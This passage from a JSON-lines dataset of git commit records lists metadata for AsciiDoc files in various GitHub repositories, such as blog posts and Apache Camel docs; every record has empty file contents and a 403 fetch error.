unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69813e7dd05d70f865b59c3914291262b5ba8e99","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32bfcea22dce15708ea9a0de8a4a14fd9a149a12","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b26825928f8abc7db8098a9571a2cf81c7a8ee6c","subject":"Adds new references","message":"Adds new references\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"628b0982abf2b1e9cdd8d2575579deefa6860e11","subject":"Update 2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","message":"Update 2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","new_file":"_posts\/2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"454a421dd004ae16453481b4039dc03ff20bfa8d","subject":"Developer Guide: Add troubleshooting section for Checkstyle-IDEA","message":"Developer Guide: Add troubleshooting section for Checkstyle-IDEA\n","repos":"damithc\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4","old_file":"docs\/DeveloperGuide.adoc","new_file":"docs\/DeveloperGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2307397a4544f4836c76a8b0e59a424320e1e45","subject":"Updated doc\/INTRODUCTION.adoc","message":"Updated doc\/INTRODUCTION.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INTRODUCTION.adoc","new_file":"doc\/INTRODUCTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2a656c3b9af28a2c9ab79cf47b5ceff8617d014","subject":"Update 2017-02-02-Dev-Ops-day-3-Xamarin.adoc","message":"Update 2017-02-02-Dev-Ops-day-3-Xamarin.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-02-02-Dev-Ops-day-3-Xamarin.adoc","new_file":"_posts\/2017-02-02-Dev-Ops-day-3-Xamarin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3bf04ff9f37be5da8482831e50407ce817ce40e","subject":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"348237bd6a8851d991a32a63a6d631c0768c3e65","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd2a3c79ce2505836a172121d8c5e037012143d7","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da44d091646ae748828b4b3ee8b2cb3d69c91ed6","subject":"Adding dev-docs around the use of Git Worktree. (#1899)","message":"Adding dev-docs around the use of Git Worktree. (#1899)\n\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"dev-docs\/working-between-major-versions.adoc","new_file":"dev-docs\/working-between-major-versions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c6cb00b892cab007db186a43cd102144b6d3825","subject":"Update 2015-12-17-Blog-Title.adoc","message":"Update 2015-12-17-Blog-Title.adoc","repos":"vba\/vba.github.io,vba\/vba.github.io,vba\/vba.github.io","old_file":"_posts\/2015-12-17-Blog-Title.adoc","new_file":"_posts\/2015-12-17-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vba\/vba.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a952a9972ed0eeb3a1bf5ce9cd08df618937f5a3","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b74ed42aa3be51c194e5cefdde7cf13c0833370","subject":"Update 2016-07-15-Blog-Title.adoc","message":"Update 2016-07-15-Blog-Title.adoc","repos":"juliosueiras\/juliosueiras.github.io,juliosueiras\/juliosueiras.github.io,juliosueiras\/juliosueiras.github.io,juliosueiras\/juliosueiras.github.io","old_file":"_posts\/2016-07-15-Blog-Title.adoc","new_file":"_posts\/2016-07-15-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juliosueiras\/juliosueiras.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"144f2f66b8d932ecc347a85bce60bfcb9366e708","subject":"Git br 4","message":"Git br 4\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching 4.adoc","new_file":"Git\/Git branching 4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d120f0778e7bedb8d7b90fa3d528b809611fdaf","subject":"y2b create post Apple iPhone 5S \\\/ 5C FULL Event Recap \\\/ Review","message":"y2b create post Apple iPhone 5S \\\/ 5C FULL Event Recap \\\/ Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-10-Apple-iPhone-5S--5C-FULL-Event-Recap--Review.adoc","new_file":"_posts\/2013-09-10-Apple-iPhone-5S--5C-FULL-Event-Recap--Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e061db3baa86f516f9c4db723dac48acc5b96cc","subject":"doc: Add missing documentation for Generate JWT policy","message":"doc: Add missing documentation for Generate JWT policy\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/user-guide\/publisher\/policies\/policy-generate-jwt.adoc","new_file":"pages\/apim\/user-guide\/publisher\/policies\/policy-generate-jwt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"456d32c759fed902840a04e277ca735268e1e82d","subject":"add changelog","message":"add changelog\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/generic-types","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebhoss\/generic-types.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"6a386231d0b1b11deb16ba4dc062db81c6951268","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-plugin-core","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-plugin-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f85d711bdfe2120a19df8e19f8e48a9da31f2c4b","subject":"Update NOTES.adoc","message":"Update NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b81b47f19c558b1330492de4bb528b5ced5f1ea","subject":"Update 2015-10-08-IT-podkasty.adoc","message":"Update 2015-10-08-IT-podkasty.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-IT-podkasty.adoc","new_file":"_posts\/2015-10-08-IT-podkasty.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9605e38c306b1f648715a55242cfca3fc62c4e8a","subject":"Update 2016-11-22-Hello-World.adoc","message":"Update 2016-11-22-Hello-World.adoc","repos":"furcon\/furcon.github.io,furcon\/furcon.github.io,furcon\/furcon.github.io,furcon\/furcon.github.io","old_file":"_posts\/2016-11-22-Hello-World.adoc","new_file":"_posts\/2016-11-22-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/furcon\/furcon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb0881af43472d422407ab56c7420f831cbba39a","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96100bef3ecda11c655c2d53f9965a0c0d6f9240","subject":"Added Multicast EIP to docs","message":"Added Multicast EIP to docs\n","repos":"davidkarlsen\/camel,jamesnetherton\/camel,sverkera\/camel,zregvart\/camel,adessaigne\/camel,anoordover\/camel,DariusX\/camel,curso007\/camel,tdiesler\/camel,christophd\/camel,rmarting\/camel,kevinearls\/camel,tadayosi\/camel,anoordover\/camel,gautric\/camel,gautric\/camel,tadayosi\/camel,cunningt\/camel,Fabryprog\/camel,tadayosi\/camel,pmoerenhout\/camel,dmvolod\/camel,objectiser\/camel,Fabryprog\/camel,rmarting\/camel,pax95\/camel,gautric\/camel,alvinkwekel\/camel,jonmcewen\/camel,pmoerenhout\/camel,anoordover\/camel,punkhorn\/camel-upstream,onders86\/camel,ullgren\/camel,pmoerenhout\/camel,onders86\/camel,onders86\/camel,onders86\/camel,sverkera\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,akhettar\/camel,apache\/camel,pax95\/camel,zregvart\/camel,anoordover\/camel,christophd\/camel,gnodet\/camel,adessaigne\/camel,cunningt\/camel,Fabryprog\/camel,tdiesler\/camel,Fabryprog\/camel,CodeSmell\/camel,gnodet\/camel,curso007\/camel,sverkera\/camel,anoordover\/camel,rmarting\/camel,kevinearls\/camel,snurmine\/camel,snurmine\/camel,snurmine\/camel,curso007\/camel,gautric\/camel,alvinkwekel\/camel,anoordover\/camel,curso007\/camel,pmoerenhout\/camel,snurmine\/camel,jamesnetherton\/camel,jonmcewen\/camel,cunningt\/camel,cunningt\/camel,tdiesler\/camel,sverkera\/camel,christophd\/camel,davidkarlsen\/camel,dmvolod\/camel,CodeSmell\/camel,tdiesler\/camel,pax95\/camel,dmvolod\/camel,sverkera\/camel,ullgren\/camel,zregvart\/camel,pmoerenhout\/camel,gautric\/camel,akhettar\/camel,rmarting\/camel,nicolaferraro\/camel,onders86\/camel,kevinearls\/camel,adessaigne\/camel,punkhorn\/camel-upstream,pax95\/camel,pmoerenhout\/camel,gautric\/camel,davidkarlsen\/camel,jonmcewen\/camel,jamesnetherton\/camel,kevinearls\/camel,objectiser\/camel,zregvart\/camel,tadayosi\/camel,dmvolod\/camel,akhettar\/camel,nicolaferraro\/camel,jamesnetherton\/camel,DariusX\/camel,onders86\/camel,akhettar\/camel,gnodet\/camel,curso007\/camel,mcollovati\/camel,DariusX\/camel,rmarting\/camel,sverkera\/camel,rmarting\/camel,cunningt\/camel,pax95\/camel,snurmine\/camel,christophd\/camel,alvinkwekel\/camel,mcollovati\/camel,nikhilvibhav\/camel,dmvolod\/camel,curso007\/camel,apache\/camel,apache\/camel,akhettar\/camel,mcollovati\/camel,tadayosi\/camel,jonmcewen\/camel,gnodet\/camel,objectiser\/camel,christophd\/camel,tdiesler\/camel,jamesnetherton\/camel,alvinkwekel\/camel,adessaigne\/camel,tdiesler\/camel,punkhorn\/camel-upstream,kevinearls\/camel,nikhilvibhav\/camel,kevinearls\/camel,CodeSmell\/camel,CodeSmell\/camel,jonmcewen\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,jonmcewen\/camel,christophd\/camel,gnodet\/camel,nicolaferraro\/camel,akhettar\/camel,pax95\/camel,ullgren\/camel,adessaigne\/camel,objectiser\/camel,mcollovati\/camel,snurmine\/camel,nikhilvibhav\/camel,ullgren\/camel,dmvolod\/camel,adessaigne\/camel,apache\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,DariusX\/camel,apache\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/multicast-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/multicast-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"504923097f32031b8a512d8012de2cb31b291efc","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe5e6e2557fc0dbd7d746186db23e987ef0c17ab","subject":"Update 2016-02-15-Test.adoc","message":"Update 2016-02-15-Test.adoc","repos":"djengineerllc\/djengineerllc.github.io,djengineerllc\/djengineerllc.github.io,djengineerllc\/djengineerllc.github.io,djengineerllc\/djengineerllc.github.io","old_file":"_posts\/2016-02-15-Test.adoc","new_file":"_posts\/2016-02-15-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djengineerllc\/djengineerllc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d4ccf40f865b72661706587d0421b9c8db44531","subject":"Sample JLP","message":"Sample JLP\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Maven central.adoc","new_file":"Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c11bb9d25be620b49e307ef1b037c013f6846966","subject":"Update 2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","message":"Update 2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_file":"_posts\/2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3943bed5e005b33f48a6fc6c04494bc14e91e40b","subject":"Update 2015-07-13-Test.adoc","message":"Update 2015-07-13-Test.adoc","repos":"trangunghoa\/hubpress.io,trangunghoa\/hubpress.io,trangunghoa\/hubpress.io","old_file":"_posts\/2015-07-13-Test.adoc","new_file":"_posts\/2015-07-13-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trangunghoa\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78d46fd8ff027c03f4663ae8a42bf621cf740bfd","subject":"CAMEL-9987: Add Asciidoc documentation","message":"CAMEL-9987: Add Asciidoc documentation\n","repos":"tadayosi\/camel,yuruki\/camel,tdiesler\/camel,YoshikiHigo\/camel,RohanHart\/camel,jonmcewen\/camel,davidkarlsen\/camel,tlehoux\/camel,gnodet\/camel,YoshikiHigo\/camel,ssharma\/camel,NickCis\/camel,jkorab\/camel,bhaveshdt\/camel,curso007\/camel,neoramon\/camel,bgaudaen\/camel,yuruki\/camel,CodeSmell\/camel,RohanHart\/camel,gautric\/camel,NickCis\/camel,punkhorn\/camel-upstream,apache\/camel,cunningt\/camel,JYBESSON\/camel,lburgazzoli\/camel,drsquidop\/camel,bhaveshdt\/camel,tadayosi\/camel,bhaveshdt\/camel,sverkera\/camel,bhaveshdt\/camel,rmarting\/camel,lburgazzoli\/camel,snurmine\/camel,bhaveshdt\/camel,jlpedrosa\/camel,akhettar\/camel,gautric\/camel,borcsokj\/camel,sverkera\/camel,gnodet\/camel,objectiser\/camel,jamesnetherton\/camel,mgyongyosi\/camel,gautric\/camel,RohanHart\/camel,tlehoux\/camel,snurmine\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,JYBESSON\/camel,driseley\/camel,neoramon\/camel,davidkarlsen\/camel,jonmcewen\/camel,bgaudaen\/camel,onders86\/camel,jlpedrosa\/camel,prashant2402\/camel,sverkera\/camel,yuruki\/camel,rmarting\/camel,tlehoux\/camel,pmoerenhout\/camel,hqstevenson\/camel,alvinkwekel\/camel,ssharma\/camel,borcsokj\/camel,jamesnetherton\/camel,anoordover\/camel,oalles\/camel,anoordover\/camel,FingolfinTEK\/camel,alvinkwekel\/camel,tkopczynski\/camel,mcollovati\/camel,Thopap\/camel,mgyongyosi\/camel,tlehoux\/camel,curso007\/camel,jkorab\/camel,dmvolod\/camel,salikjan\/camel,w4tson\/camel,zregvart\/camel,ssharma\/camel,lburgazzoli\/camel,tadayosi\/camel,prashant2402\/camel,pkletsko\/camel,scranton\/camel,prashant2402\/camel,jkorab\/camel,jkorab\/camel,onders86\/camel,lburgazzoli\/camel,pax95\/camel,snurmine\/camel,sverkera\/camel,onders86\/camel,alvinkwekel\/camel,jarst\/camel,jonmcewen\/camel,anton-k11\/camel,chirino\/camel,jmandawg\/camel,isavin\/camel,isavin\/camel,mcollovati\/camel,dmvolod\/camel,anoordover\/camel,YoshikiHigo\/camel,christophd\/camel,gilfernandes\/camel,jamesnetherton\/camel,hqstevenson\/camel,yuruki\/camel,jarst\/camel,tkopczynski\/camel,jarst\/camel,yuruki\/camel,christophd\/camel,borcsokj\/camel,Fabryprog\/camel,oalles\/camel,dmvolod\/camel,nicolaferraro\/camel,nboukhed\/camel,tlehoux\/camel,snurmine\/camel,isavin\/camel,Thopap\/camel,curso007\/camel,oalles\/camel,hqstevenson\/camel,jarst\/camel,chirino\/camel,christophd\/camel,bhaveshdt\/camel,tkopczynski\/camel,sverkera\/camel,nikhilvibhav\/camel,CodeSmell\/camel,kevinearls\/camel,jkorab\/camel,dmvolod\/camel,ullgren\/camel,veithen\/camel,jmandawg\/camel,RohanHart\/camel,nikvaessen\/camel,Thopap\/camel,dmvolod\/camel,prashant2402\/camel,tdiesler\/camel,drsquidop\/camel,objectiser\/camel,curso007\/camel,nikhilvibhav\/camel,salikjan\/camel,sirlatrom\/camel,punkhorn\/camel-upstream,YoshikiHigo\/camel,apache\/camel,gilfernandes\/camel,bgaudaen\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,acartapanis\/camel,jonmcewen\/camel,nikvaessen\/camel,anoordover\/camel,anoordover\/camel,snurmine\/camel,alvinkwekel\/camel,cunningt\/camel,lburgazzoli\/apache-camel,borcsokj\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,dmvolod\/camel,veithen\/camel,scranton\/camel,tkopczynski\/camel,pmoerenhout\/camel,objectiser\/camel,oalles\/camel,driseley\/camel,driseley\/camel,tdiesler\/camel,RohanHart\/camel,acartapanis\/camel,cunningt\/camel,sirlatrom\/camel,chirino\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,rmarting\/camel,sabre1041\/camel,NickCis\/camel,lburgazzoli\/apache-camel,bgaudaen\/camel,jamesnetherton\/camel,sirlatrom\/camel,pkletsko\/camel,oalles\/camel,neoramon\/camel,nikvaessen\/camel,ullgren\/camel,drsquidop\/camel,pkletsko\/camel,Thopap\/camel,akhettar\/camel,gnodet\/camel,chirino\/camel,punkhorn\/camel-upstream,acartapanis\/camel,Thopap\/camel,oalles\/camel,Fabryprog\/camel,onders86\/camel,driseley\/camel,pmoerenhout\/camel,sabre1041\/camel,lburgazzoli\/camel,mgyongyosi\/camel,pax95\/camel,Fabryprog\/camel,nikvaessen\/camel,NickCis\/camel,driseley\/camel,sabre1041\/camel,CodeSmell\/camel,drsquidop\/camel,FingolfinTEK\/camel,allancth\/camel,kevinearls\/camel,pmoerenhout\/camel,w4tson\/camel,NickCis\/camel,tkopczynski\/camel,scranton\/camel,scranton\/camel,drsquidop\/camel,gilfernandes\/camel,christophd\/camel,nikvaessen\/camel,sabre1041\/camel,jarst\/camel,jonmcewen\/camel,pax95\/camel,JYBESSON\/camel,curso007\/camel,mcollovati\/camel,DariusX\/camel,allancth\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,ssharma\/camel,akhettar\/camel,pmoerenhout\/camel,sabre1041\/camel,NickCis\/camel,scranton\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,kevinearls\/camel,tkopczynski\/camel,allancth\/camel,borcsokj\/camel,curso007\/camel,nboukhed\/camel,neoramon\/camel,tadayosi\/camel,tdiesler\/camel,nikvaessen\/camel,prashant2402\/camel,jlpedrosa\/camel,jonmcewen\/camel,zregvart\/camel,zregvart\/camel,w4tson\/camel,apache\/camel,pmoerenhout\/camel,DariusX\/camel,FingolfinTEK\/camel,akhettar\/camel,davidkarlsen\/camel,anton-k11\/camel,gilfernandes\/camel,zregvart\/camel,pax95\/camel,davidkarlsen\/camel,tdiesler\/camel,apache\/camel,mgyongyosi\/camel,acartapanis\/camel,ullgren\/camel,yuruki\/camel,pkletsko\/camel,adessaigne\/camel,adessaigne\/camel,nicolaferraro\/camel,FingolfinTEK\/camel,acartapanis\/camel,RohanHart\/camel,neoramon\/camel,kevinearls\/camel,tdiesler\/camel,kevinearls\/camel,rmarting\/camel,gautric\/camel,jmandawg\/camel,tadayosi\/camel,scranton\/camel,nboukhed\/camel,JYBESSON\/camel,pax95\/camel,chirino\/camel,veithen\/camel,veithen\/camel,allancth\/camel,jmandawg\/camel,hqstevenson\/camel,gnodet\/camel,pkletsko\/camel,borcsokj\/camel,sirlatrom\/camel,cunningt\/camel,hqstevenson\/camel,onders86\/camel,bgaudaen\/camel,isavin\/camel,rmarting\/camel,christophd\/camel,pkletsko\/camel,kevinearls\/camel,nboukhed\/camel,DariusX\/camel,FingolfinTEK\/camel,christophd\/camel,nboukhed\/camel,w4tson\/camel,prashant2402\/camel,Thopap\/camel,jlpedrosa\/camel,w4tson\/camel,anoordover\/camel,sabre1041\/camel,driseley\/camel,jarst\/camel,isavin\/camel,acartapanis\/camel,isavin\/camel,ssharma\/camel,apache\/camel,akhettar\/camel,jmandawg\/camel,sverkera\/camel,cunningt\/camel,jmandawg\/camel,veithen\/camel,mcollovati\/camel,jamesnetherton\/camel,hqstevenson\/camel,anton-k11\/camel,gautric\/camel,YoshikiHigo\/camel,gautric\/camel,adessaigne\/camel,objectiser\/camel,allancth\/camel,CodeSmell\/camel,JYBESSON\/camel,mgyongyosi\/camel,nboukhed\/camel,anton-k11\/camel,allancth\/camel,neoramon\/camel,JYBESSON\/camel,jlpedrosa\/camel,jlpedrosa\/camel,adessaigne\/camel,YoshikiHigo\/camel,lburgazzoli\/camel,w4tson\/camel,onders86\/camel,adessaigne\/camel,mgyongyosi\/camel,anton-k11\/camel,ssharma\/camel,sirlatrom\/camel,bgaudaen\/camel,veithen\/camel,cunningt\/camel,gilfernandes\/camel,chirino\/camel,gilfernandes\/camel,sirlatrom\/camel,rmarting\/camel,drsq